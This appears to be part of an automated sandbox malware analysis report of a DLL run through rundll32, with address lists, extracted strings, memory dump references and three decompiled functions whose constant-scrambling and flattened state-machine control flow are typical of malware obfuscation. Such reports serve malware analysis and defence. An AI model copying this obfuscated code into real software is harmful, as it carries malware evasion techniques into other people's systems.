0x10004bf5
0x10004bf9
0x10004bfa
0x10004bfb
0x10004c00
0x10004c08
0x10004c0b
0x10004c15
0x10004c1d
0x10004c1f
0x10004c27
0x10004c33
0x10004c36
0x10004c3a
0x10004c42
0x10004c4a
0x10004c52
0x10004c5a
0x10004c62
0x10004c6a
0x10004c72
0x10004c7f
0x10004c8b
0x10004c8f
0x10004c97
0x10004c9f
0x10004cab
0x10004cb0
0x10004cb6
0x10004cbe
0x10004cc6
0x10004cce
0x10004cd6
0x10004cde
0x10004ce6
0x10004cee
0x10004cfa
0x10004cff
0x10004d05
0x10004d0d
0x10004d15
0x10004d1a
0x10004d22
0x10004d2a
0x10004d2e
0x10004d31
0x10004d35
0x10004d3d
0x10004d45
0x10004d4d
0x10004d55
0x10004d5d
0x10004d61
0x10004d66
0x10004d6e
0x10004d7b
0x10004d83
0x10004d88
0x10004d90
0x10004d98
0x10004da0
0x10004da8
0x10004db0
0x10004db4
0x10004dc6
0x10004e60
0x00000000
0x10004dcc
0x10004dce
0x10004e26
0x10004e49
0x10004e4e
0x10004e51
0x10004e58
0x00000000
0x10004dd0
0x10004dd6
0x10004e0f
0x10004e14
0x10004e19
0x10004e1b
0x00000000
0x10004e1b
0x10004dd8
0x10004dde
0x10004e8b
0x10004e91
0x00000000
0x00000000
0x10004de4
0x10004df3
0x10004df7
0x10004dfc
0x10004e01
0x10004e07
0x00000000
0x10004e07
0x10004e01
0x10004dde
0x10004dd6
0x10004dce
0x10004ea0
0x10004ea0
0x10004e7e
0x10004e83
0x10004e86
0x00000000

Strings

ki, xrefs: 10004D35
V, xrefs: 10004CBE
@<, xrefs: 10004D2A
|g, xrefs: 10004D0D
Xs, xrefs: 10004C15
[, xrefs: 10004CE6

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Xs$[$ki$|g$@<$V
API String ID: 0-1782315456
Opcode ID: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
Instruction ID: d5753dc0bbcc3aea306371c6b81f33b505aaf0871162b6c422c34f7178ca26c7
Opcode Fuzzy Hash: 0f14377d98c16b5985b99b724adaf78676166183dbeb8b997100305714497c0a
Instruction Fuzzy Hash: 2C6155B1509340AFE794CF21C88581FBBF2FBD4798F414A1DF695462A0C775DA098B87

Uniqueness

Uniqueness Score: -1.00%

Function 1001231B, Relevance: 6.6, Strings: 5, Instructions: 327
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001231B(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t296;
				void* _t321;
				intOrPtr _t325;
				void* _t327;
				short _t328;
				void* _t334;
				signed int _t338;
				signed int _t339;
				void* _t341;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t390;
				signed int _t391;
				signed int _t394;
				signed int* _t396;
				void* _t398;

				_push(_a12);
				_t377 = _a4;
				_push(_a8);
				_push(_t377);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t296);
				_v8 = _v8 & 0x00000000;
				_t396 =  &(( &_v124)[5]);
				_v96 = 0x1023;
				_v96 = _v96 ^ 0xe47dc4fc;
				_t341 = 0x27600fdb;
				_v96 = _v96 ^ 0x32abab6c;
				_v96 = _v96 | 0x6d93312b;
				_v96 = _v96 ^ 0xffd78252;
				_v16 = 0xdaf7;
				_t381 = 0x16;
				_v16 = _v16 / _t381;
				_v16 = _v16 ^ 0x000001c4;
				_v20 = 0x6395;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x18e533fd;
				_v88 = 0xa972;
				_v88 = _v88 | 0xad5f380f;
				_t382 = 0x43;
				_v88 = _v88 / _t382;
				_v88 = _v88 * 0x65;
				_v88 = _v88 ^ 0x055ac7b0;
				_v44 = 0xf64e;
				_v44 = _v44 ^ 0xc329889b;
				_v44 = _v44 ^ 0xc3290878;
				_v120 = 0x240c;
				_v120 = _v120 ^ 0x7b0f575c;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x9190;
				_v120 = _v120 ^ 0xee6af427;
				_v68 = 0x2382;
				_v68 = _v68 ^ 0xaf4a09f1;
				_v68 = _v68 + 0xffff93b5;
				_v68 = _v68 ^ 0xaf49ee02;
				_v124 = 0xa6c0;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 << 0xf;
				_v124 = _v124 * 0x50;
				_v124 = _v124 ^ 0x01900d65;
				_v48 = 0x59b;
				_v48 = _v48 | 0x1d932e17;
				_v48 = _v48 ^ 0x1d93434e;
				_v32 = 0x7dc;
				_v32 = _v32 | 0x7a0a60f4;
				_v32 = _v32 ^ 0x7a0a2147;
				_v36 = 0xa0ae;
				_v36 = _v36 | 0x35bc5344;
				_v36 = _v36 ^ 0x35bce77d;
				_v40 = 0xf45a;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x00007c19;
				_v24 = 0xd9df;
				_v24 = _v24 + 0x4204;
				_v24 = _v24 ^ 0x00011e54;
				_v28 = 0xf9ca;
				_v28 = _v28 ^ 0x4b2056fe;
				_v28 = _v28 ^ 0x4b20b363;
				_v112 = 0xa35c;
				_t383 = 7;
				_v112 = _v112 / _t383;
				_v112 = _v112 >> 8;
				_v112 = _v112 ^ 0x00007415;
				_v100 = 0x2d35;
				_v100 = _v100 | 0x4fbfcbdf;
				_v100 = _v100 + 0xffffcb51;
				_v100 = _v100 ^ 0x4fbfa459;
				_v104 = 0x199f;
				_v104 = _v104 | 0xa6a9e361;
				_v104 = _v104 ^ 0x0fa1695b;
				_t384 = 0x70;
				_v104 = _v104 * 0x34;
				_v104 = _v104 ^ 0x55bdfdea;
				_v108 = 0x6dac;
				_v108 = _v108 + 0x7618;
				_v108 = _v108 | 0xd437a5be;
				_v108 = _v108 >> 5;
				_v108 = _v108 ^ 0x06a1e076;
				_v52 = 0xb587;
				_v52 = _v52 / _t384;
				_v52 = _v52 | 0x698df789;
				_v52 = _v52 ^ 0x698dbdb0;
				_v56 = 0xcc44;
				_t385 = 0x54;
				_v56 = _v56 / _t385;
				_v56 = _v56 + 0xffff840a;
				_v56 = _v56 ^ 0xffffb5b3;
				_v92 = 0x53df;
				_t386 = 0x38;
				_v92 = _v92 * 0x2b;
				_v92 = _v92 ^ 0x72368f4f;
				_v92 = _v92 * 0x5f;
				_v92 = _v92 ^ 0x6300adc9;
				_v60 = 0xeb4;
				_v60 = _v60 ^ 0x82e65f12;
				_v60 = _v60 * 0x12;
				_v60 = _v60 ^ 0x3431ffe0;
				_v76 = 0x9ea1;
				_v76 = _v76 / _t386;
				_v76 = _v76 << 9;
				_v76 = _v76 | 0x56c1a970;
				_v76 = _v76 ^ 0x56c5f8a5;
				_v80 = 0xe36f;
				_t387 = 0x71;
				_v80 = _v80 / _t387;
				_v80 = _v80 >> 0xa;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 ^ 0x00002ab6;
				_v12 = 0xbe7b;
				_v12 = _v12 ^ 0xb73b4484;
				_v12 = _v12 ^ 0xb73bd21d;
				_v84 = 0x2f05;
				_v84 = _v84 ^ 0x486d0961;
				_v84 = _v84 * 0x18;
				_v84 = _v84 ^ 0xccd4c0a7;
				_v84 = _v84 ^ 0x06ef1f50;
				_v72 = 0xb051;
				_v72 = _v72 | 0x44f81078;
				_t394 = _v4;
				_t338 = _v4;
				_v72 = _v72 * 0x1b;
				_v72 = _v72 ^ 0x463a9cc3;
				_v116 = 0x904e;
				_v116 = _v116 >> 6;
				_v116 = _v116 | 0x00eb6e86;
				_v116 = _v116 >> 8;
				_v116 = _v116 ^ 0x0000eb6e;
				_v64 = 0x30db;
				_v64 = _v64 + 0xffffb1c5;
				_v64 = _v64 ^ 0x9ee5eb39;
				_v64 = _v64 ^ 0x611a0999;
				while(1) {
					_t321 = 0x5942909;
					while(1) {
						L2:
						_t398 = _t341 - 0x19684f4e;
						if(_t398 > 0) {
							break;
						}
						if(_t398 == 0) {
							E100091CD(_v52, _v56, _v92, _t394, _v60);
							_t396 =  &(_t396[3]);
							_t341 = 0x203b69b2;
							while(1) {
								_t321 = 0x5942909;
								goto L2;
							}
						} else {
							if(_t341 == 0x45bbbee) {
								 *(_t377 + 4) = _v64;
								_t325 = E1000C6EF(_t377 + 4, _v96, _v100, _v104, _t338 - 1, _t394, _v108);
								_t396 =  &(_t396[5]);
								 *_t377 = _t325;
								_t341 = 0x19684f4e;
								while(1) {
									_t321 = 0x5942909;
									goto L2;
								}
							} else {
								if(_t341 == _t321) {
									_t338 = _v116;
									_t379 = _v8;
									if(_t379 != 0) {
										do {
											E10015891(_t379 + 0x2c, _t338 * 2 + _t394, _v32, _v36, _v40);
											_t327 = E1001BBAB(_v24, _v28, _t379 + 0x2c, _v112);
											_t396 =  &(_t396[5]);
											_t339 = _t338 + _t327;
											_t328 = 0x2c;
											 *((short*)(_t394 + _t339 * 2)) = _t328;
											_t338 = _t339 + 1;
											_t379 =  *((intOrPtr*)(_t379 + 0x1c));
										} while (_t379 != 0);
										_t321 = 0x5942909;
									}
									_t391 = _v4;
									_t341 = 0x45bbbee;
									goto L13;
								} else {
									if(_t341 == 0xb31c45f) {
										_t391 = _v72;
										_t380 = _v8;
										_v4 = _t391;
										if(_t380 != 0) {
											do {
												_t334 = E1001BBAB(_v44, _v120, _t380 + 0x2c, _v68);
												_t380 =  *((intOrPtr*)(_t380 + 0x1c));
												_t391 = _t391 + 1 + _t334;
											} while (_t380 != 0);
											_v4 = _t391;
											_t321 = 0x5942909;
										}
										_t341 = 0xd80ae87;
										L13:
										_t377 = _a4;
										continue;
									} else {
										if(_t341 == 0xd80ae87) {
											_push(_t341);
											_t394 = E100157E8(_t391 + _t391);
											_t321 = 0x5942909;
											_t341 =  !=  ? 0x5942909 : 0x203b69b2;
											continue;
										}
									}
								}
							}
						}
						L29:
						if(_t341 != 0x178c149f) {
							continue;
						}
						return 0 |  *_t377 != 0x00000000;
					}
					if(_t341 == 0x203b69b2) {
						_t378 = _v8;
						if(_t378 != 0) {
							do {
								_t390 =  *(_t378 + 0x1c);
								E100091CD(_v76, _v80, _v12, _t378, _v84);
								_t396 =  &(_t396[3]);
								_t378 = _t390;
							} while (_t390 != 0);
							_t321 = 0x5942909;
						}
						_t377 = _a4;
						_t341 = 0x178c149f;
					} else {
						if(_t341 == 0x27600fdb) {
							_t341 = 0x2d4988fb;
							goto L2;
						} else {
							if(_t341 == 0x2d4988fb) {
								E100142E2( &_v8, E10005EB9, _v20, _v88);
								_t396 =  &(_t396[3]);
								_t341 = 0xb31c45f;
								continue;
							}
						}
					}
					goto L29;
				}
			}

0x10012322
0x10012329
0x10012330
0x10012337
0x10012338
0x10012339
0x1001233a
0x1001233f
0x10012347
0x1001234a
0x10012354
0x1001235c
0x10012361
0x10012369
0x10012371
0x10012379
0x10012387
0x1001238c
0x10012395
0x100123a0
0x100123a8
0x100123ad
0x100123b5
0x100123bd
0x100123c9
0x100123cc
0x100123d5
0x100123d9
0x100123e1
0x100123e9
0x100123f1
0x100123f9
0x10012401
0x10012409
0x1001240e
0x10012416
0x1001241e
0x10012426
0x1001242e
0x10012436
0x1001243e
0x10012446
0x1001244b
0x10012455
0x10012459
0x10012461
0x10012469
0x10012471
0x10012479
0x10012481
0x10012489
0x10012491
0x10012499
0x100124a1
0x100124a9
0x100124b1
0x100124b6
0x100124be
0x100124c6
0x100124ce
0x100124d6
0x100124de
0x100124e6
0x100124ee
0x10012506
0x1001250b
0x10012511
0x10012516
0x1001251e
0x10012526
0x1001252e
0x10012536
0x1001253e
0x10012546
0x1001254e
0x1001255b
0x1001255e
0x10012562
0x1001256a
0x10012572
0x1001257a
0x10012582
0x10012587
0x1001258f
0x1001259f
0x100125a3
0x100125ab
0x100125b3
0x100125bf
0x100125c4
0x100125ca
0x100125d2
0x100125da
0x100125e7
0x100125ea
0x100125ee
0x100125fb
0x100125ff
0x10012607
0x1001260f
0x1001261c
0x10012620
0x10012628
0x10012638
0x1001263c
0x10012641
0x10012649
0x10012651
0x1001265d
0x10012660
0x10012664
0x10012669
0x1001266e
0x10012676
0x10012681
0x1001268c
0x10012697
0x1001269f
0x100126ac
0x100126b0
0x100126b8
0x100126c0
0x100126c8
0x100126d5
0x100126dc
0x100126ea
0x100126ee
0x100126f6
0x100126fe
0x10012703
0x1001270b
0x10012710
0x10012718
0x10012720
0x10012728
0x10012730
0x10012738
0x10012738
0x1001273d
0x1001273d
0x1001273d
0x10012743
0x00000000
0x00000000
0x10012749
0x100128a1
0x100128a6
0x100128a9
0x10012738
0x10012738
0x00000000
0x10012738
0x1001274f
0x10012755
0x10012869
0x1001287c
0x10012881
0x10012884
0x10012886
0x10012738
0x10012738
0x00000000
0x10012738
0x1001275b
0x1001275d
0x100127f0
0x100127f4
0x100127fd
0x100127ff
0x10012819
0x10012831
0x10012836
0x10012839
0x1001283d
0x1001283e
0x10012843
0x10012844
0x10012847
0x1001284b
0x1001284b
0x10012850
0x10012857
0x00000000
0x10012763
0x10012769
0x1001279c
0x100127a0
0x100127a7
0x100127b0
0x100127b2
0x100127c2
0x100127c7
0x100127cc
0x100127cf
0x100127d3
0x100127da
0x100127da
0x100127df
0x100127e4
0x100127e4
0x00000000
0x1001276b
0x10012771
0x1001277f
0x10012788
0x1001278a
0x10012797
0x00000000
0x10012797
0x10012771
0x10012769
0x1001275d
0x10012755
0x10012943
0x10012950
0x00000000
0x00000000
0x10012964
0x10012964
0x100128b9
0x10012902
0x1001290b
0x1001290d
0x10012911
0x10012924
0x10012929
0x1001292c
0x1001292e
0x10012932
0x10012932
0x10012937
0x1001293e
0x100128bb
0x100128c1
0x100128f8
0x00000000
0x100128c3
0x100128c9
0x100128e6
0x100128eb
0x100128ee
0x00000000
0x100128ee
0x100128c9
0x100128c1
0x00000000
0x100128b9

Strings

G!z, xrefs: 10012489
5-, xrefs: 1001251E
n, xrefs: 10012710
o, xrefs: 10012651
amH, xrefs: 1001269F

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5-$G!z$amH$n$o
API String ID: 0-2418732634
Opcode ID: 3887bab40c44b1641d7bbcfab6a6f4e19126a941134cafb96a2f4f2f1bff6032
Instruction ID: 6f407b80c570a864ccd2820a3afddbd72b69261bff4ce0457850b771c8ca1b73
Opcode Fuzzy Hash: 3887bab40c44b1641d7bbcfab6a6f4e19126a941134cafb96a2f4f2f1bff6032
Instruction Fuzzy Hash: 7DF141754083818FD368CF25C58664FBBE1FBC4758F60890DF29A9A260CB75D989CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1001C04C, Relevance: 6.4, Strings: 5, Instructions: 182
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1001C04C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t150;
				void* _t174;
				void* _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a8);
				_t213 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t150);
				_v80 = 0xc784;
				_t217 =  &(( &_v112)[4]);
				_v80 = _v80 << 4;
				_t214 = 0;
				_t189 = 0x33fb58ad;
				_t181 = 0x6b;
				_v80 = _v80 * 0x28;
				_v80 = _v80 ^ 0x01f2d8b7;
				_v84 = 0x50fb;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 + 0x937e;
				_v84 = _v84 ^ 0x0000fdde;
				_v56 = 0x327d;
				_v56 = _v56 + 0xffffdcf3;
				_v56 = _v56 ^ 0x00004b6f;
				_v88 = 0x146d;
				_v88 = _v88 ^ 0x8349746f;
				_v88 = _v88 / _t181;
				_v88 = _v88 ^ 0x013a5398;
				_v60 = 0xe2fe;
				_t182 = 0x25;
				_v60 = _v60 * 0x79;
				_v60 = _v60 ^ 0x006b2efa;
				_v64 = 0xc02b;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x00002cf4;
				_v92 = 0x8680;
				_v92 = _v92 * 0x7e;
				_v92 = _v92 + 0xffff14d8;
				_v92 = _v92 ^ 0x004119fe;
				_v96 = 0x22ae;
				_v96 = _v96 * 0x57;
				_v96 = _v96 * 0x15;
				_v96 = _v96 ^ 0x00f7010a;
				_v68 = 0x9e2a;
				_v68 = _v68 << 0xa;
				_v68 = _v68 ^ 0x0278df5a;
				_v100 = 0x70f1;
				_v100 = _v100 + 0x9f07;
				_v100 = _v100 << 7;
				_v100 = _v100 ^ 0x0087eaa7;
				_v72 = 0xae27;
				_v72 = _v72 + 0xffff81b6;
				_v72 = _v72 ^ 0x00001dbd;
				_v76 = 0xeb69;
				_v76 = _v76 + 0xe753;
				_v76 = _v76 / _t182;
				_v76 = _v76 ^ 0x00001cc5;
				_v104 = 0x4553;
				_v104 = _v104 + 0xffffebb9;
				_t183 = 0x7e;
				_v104 = _v104 / _t183;
				_t184 = 0xe;
				_v104 = _v104 / _t184;
				_v104 = _v104 ^ 0x00003b66;
				_v108 = 0x5045;
				_t185 = 0x38;
				_v108 = _v108 / _t185;
				_t186 = 0x45;
				_v108 = _v108 * 0x58;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 ^ 0x002412f1;
				_v112 = 0x2d31;
				_v112 = _v112 / _t186;
				_v112 = _v112 ^ 0x7267b250;
				_v112 = _v112 + 0xd72;
				_v112 = _v112 ^ 0x7267a792;
				while(_t189 != 0x8879467) {
					if(_t189 == 0x1932f021) {
						_t174 = E1001D290(_v88, _v60, _v64, _t213, _v92,  &_v52);
						_t217 =  &(_t217[4]);
						__eflags = _t174;
						if(__eflags != 0) {
							_t189 = 0x36f0c2c4;
							continue;
						}
					} else {
						if(_t189 == 0x33be0ba1) {
							_t147 = _t213 + 8; // 0x3ba4bc1b
							__eflags = E10009899(_t147, _v76, __eflags,  &_v52, _v104, _v108, _v112);
							_t214 =  !=  ? 1 : _t214;
							__eflags = _t214;
						} else {
							if(_t189 == 0x33fb58ad) {
								_t189 = 0x8879467;
								continue;
							} else {
								if(_t189 != 0x36f0c2c4) {
									L12:
									__eflags = _t189 - 0x2249cb7b;
									if(__eflags != 0) {
										continue;
									} else {
									}
								} else {
									_t130 = _t213 + 4; // 0x3ba4bc17
									_t180 = E1001D290(_v96, _v68, _v100, _t130, _v72,  &_v52);
									_t217 =  &(_t217[4]);
									if(_t180 != 0) {
										_t189 = 0x33be0ba1;
										continue;
									}
								}
							}
						}
					}
					return _t214;
				}
				E1001F3E9(_v80, _v84, _v56, _a4,  &_v52);
				_t217 =  &(_t217[3]);
				_t189 = 0x1932f021;
				goto L12;
			}

0x1001c053
0x1001c05a
0x1001c05c
0x1001c063
0x1001c064
0x1001c065
0x1001c06a
0x1001c072
0x1001c075
0x1001c081
0x1001c083
0x1001c08a
0x1001c08d
0x1001c091
0x1001c099
0x1001c0a1
0x1001c0a6
0x1001c0ae
0x1001c0b6
0x1001c0be
0x1001c0c6
0x1001c0ce
0x1001c0d6
0x1001c0e6
0x1001c0ea
0x1001c0f2
0x1001c0ff
0x1001c102
0x1001c106
0x1001c10e
0x1001c116
0x1001c11b
0x1001c123
0x1001c130
0x1001c134
0x1001c13c
0x1001c144
0x1001c151
0x1001c15a
0x1001c15e
0x1001c166
0x1001c16e
0x1001c173
0x1001c17b
0x1001c183
0x1001c18b
0x1001c190
0x1001c198
0x1001c1a0
0x1001c1a8
0x1001c1b0
0x1001c1b8
0x1001c1c8
0x1001c1cc
0x1001c1d4
0x1001c1dc
0x1001c1e8
0x1001c1ed
0x1001c1f7
0x1001c1fc
0x1001c202
0x1001c20f
0x1001c21b
0x1001c220
0x1001c22b
0x1001c22c
0x1001c235
0x1001c239
0x1001c241
0x1001c254
0x1001c258
0x1001c260
0x1001c268
0x1001c270
0x1001c27a
0x1001c2db
0x1001c2e0
0x1001c2e3
0x1001c2e5
0x1001c2e7
0x00000000
0x1001c2e7
0x1001c27c
0x1001c27e
0x1001c32d
0x1001c344
0x1001c346
0x1001c346
0x1001c284
0x1001c28a
0x1001c2c1
0x00000000
0x1001c28c
0x1001c292
0x1001c313
0x1001c313
0x1001c319
0x00000000
0x00000000
0x1001c31f
0x1001c294
0x1001c29d
0x1001c2ad
0x1001c2b2
0x1001c2b7
0x1001c2bd
0x00000000
0x1001c2bd
0x1001c2b7
0x1001c292
0x1001c28a
0x1001c27e
0x1001c352
0x1001c352
0x1001c306
0x1001c30b
0x1001c30e
0x00000000

Strings

f;, xrefs: 1001C202
S, xrefs: 1001C1B8
r, xrefs: 1001C260
EP, xrefs: 1001C20F
oK, xrefs: 1001C0C6

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: EP$S$f;$oK$r
API String ID: 0-800867564
Opcode ID: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
Instruction ID: d204fd09f4313df74329eeb12e1bf2a89ad17ecc6e86b591d2f7d2102d956d92
Opcode Fuzzy Hash: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
Instruction Fuzzy Hash: BB8152715083419FE354CF65C88581FBBF5FBC9348F50891EF5998A2A0D3B6CA898B42

Uniqueness

Uniqueness Score: -1.00%

Function 1001CDCC, Relevance: 6.4, Strings: 5, Instructions: 160
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1001CDCC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a24) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t139;
				signed int _t152;
				void* _t157;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t175;
				signed int* _t178;

				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t139);
				_v28 = 0x325f;
				_t178 =  &(( &_v56)[8]);
				_v28 = _v28 + 0xffff4d87;
				_v28 = _v28 + 0xffff7eee;
				_t175 = 0;
				_v28 = _v28 ^ 0xfffeea83;
				_t157 = 0x2e625de7;
				_v16 = 0x7ea1;
				_t171 = 0x4c;
				_v16 = _v16 * 0x50;
				_v16 = _v16 ^ 0x0027b5c0;
				_v48 = 0xb396;
				_v48 = _v48 << 2;
				_v48 = _v48 + 0xffffd4e6;
				_v48 = _v48 * 0x23;
				_v48 = _v48 ^ 0x005c32d3;
				_v52 = 0x4c8e;
				_v52 = _v52 >> 4;
				_v52 = _v52 + 0xffff8362;
				_v52 = _v52 | 0xaf524c7b;
				_v52 = _v52 ^ 0xffffb92c;
				_v20 = 0xd7f5;
				_v20 = _v20 | 0xc3990154;
				_v20 = _v20 ^ 0xc3999ac5;
				_v56 = 0x9c91;
				_v56 = _v56 | 0x8c86dbc7;
				_v56 = _v56 + 0xf56e;
				_v56 = _v56 ^ 0x560a30e6;
				_v56 = _v56 ^ 0xda8da389;
				_v12 = 0xdf7a;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0x0001eefc;
				_v24 = 0x3c6;
				_v24 = _v24 | 0x5cdca8ce;
				_v24 = _v24 + 0x7ec4;
				_v24 = _v24 ^ 0x5cdd52aa;
				_v4 = 0xc884;
				_v4 = _v4 | 0x864be180;
				_v4 = _v4 ^ 0x864b8e34;
				_v32 = 0xecf0;
				_v32 = _v32 / _t171;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x00000683;
				_v8 = 0xa81d;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x05408dca;
				_v36 = 0x9864;
				_t172 = 0x59;
				_v36 = _v36 / _t172;
				_v36 = _v36 ^ 0xaaa5894b;
				_v36 = _v36 + 0xffff7394;
				_v36 = _v36 ^ 0xaaa4dea0;
				_v40 = 0xd8eb;
				_v40 = _v40 + 0x511b;
				_v40 = _v40 >> 3;
				_v40 = _v40 + 0xffff6e25;
				_v40 = _v40 ^ 0xffffcd83;
				_v44 = 0x92f;
				_v44 = _v44 ^ 0xfb5f1719;
				_v44 = _v44 << 3;
				_t173 = 0x32;
				_t174 = _v4;
				_v44 = _v44 / _t173;
				_v44 = _v44 ^ 0x0461405b;
				do {
					while(_t157 != 0xc7aef4e) {
						if(_t157 == 0x1f37240b) {
							_t152 = E1000CF11(0, _a16, _v28, 0xffffffff, _v16, _t157, _v48, 0, _v52, _a8, _v20, _v56);
							_t174 = _t152;
							_t178 =  &(_t178[0xa]);
							if(_t152 != 0) {
								_t157 = 0xc7aef4e;
								continue;
							}
						} else {
							if(_t157 == 0x2e625de7) {
								_t157 = 0x1f37240b;
								continue;
							} else {
								if(_t157 != 0x32a206ac) {
									goto L13;
								} else {
									E1000CF11(_t174, _a16, _v4, 0xffffffff, _v32, _t157, _v8, _t175, _v36, _a8, _v40, _v44);
								}
							}
						}
						L6:
						return _t175;
					}
					_push(_t157);
					_t175 = E100157E8(_t174 + _t174);
					if(_t175 == 0) {
						_t157 = 0x3ab8f213;
						goto L13;
					} else {
						_t157 = 0x32a206ac;
						continue;
					}
					goto L6;
					L13:
				} while (_t157 != 0x3ab8f213);
				goto L6;
			}

0x1001cdd3
0x1001cdd7
0x1001cdd9
0x1001cddd
0x1001cddf
0x1001cde3
0x1001cde7
0x1001cde8
0x1001cde9
0x1001cdee
0x1001cdf6
0x1001cdf9
0x1001ce03
0x1001ce0b
0x1001ce0d
0x1001ce15
0x1001ce1a
0x1001ce29
0x1001ce2c
0x1001ce30
0x1001ce38
0x1001ce40
0x1001ce45
0x1001ce52
0x1001ce56
0x1001ce5e
0x1001ce66
0x1001ce6b
0x1001ce73
0x1001ce7b
0x1001ce83
0x1001ce8b
0x1001ce93
0x1001ce9b
0x1001cea3
0x1001ceab
0x1001ceb3
0x1001cebb
0x1001cec3
0x1001cecb
0x1001cecf
0x1001ced7
0x1001cedf
0x1001cee7
0x1001ceef
0x1001cef7
0x1001ceff
0x1001cf07
0x1001cf0f
0x1001cf1f
0x1001cf23
0x1001cf28
0x1001cf2d
0x1001cf35
0x1001cf3d
0x1001cf42
0x1001cf4a
0x1001cf56
0x1001cf59
0x1001cf5d
0x1001cf65
0x1001cf6d
0x1001cf75
0x1001cf7d
0x1001cf85
0x1001cf8a
0x1001cf92
0x1001cf9a
0x1001cfa4
0x1001cfb1
0x1001cfc1
0x1001cfc4
0x1001cfc8
0x1001cfcc
0x1001cfd4
0x1001cfd4
0x1001cfde
0x1001d057
0x1001d05c
0x1001d05e
0x1001d063
0x1001d065
0x00000000
0x1001d065
0x1001cfe0
0x1001cfe6
0x1001d02c
0x00000000
0x1001cfe8
0x1001cfee
0x00000000
0x1001cff4
0x1001d01a
0x1001d01f
0x1001cfee
0x1001cfe6
0x1001d023
0x1001d02b
0x1001d02b
0x1001d074
0x1001d07d
0x1001d082
0x1001d08e
0x00000000
0x1001d084
0x1001d084
0x00000000
0x1001d084
0x00000000
0x1001d093
0x1001d093
0x00000000

Strings

]b., xrefs: 1001CFE0
/, xrefs: 1001CF9A
]b., xrefs: 1001CE15
0V, xrefs: 1001CEB3
_2, xrefs: 1001CDEE

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$_2$0V$]b.$]b.
API String ID: 0-2210830570
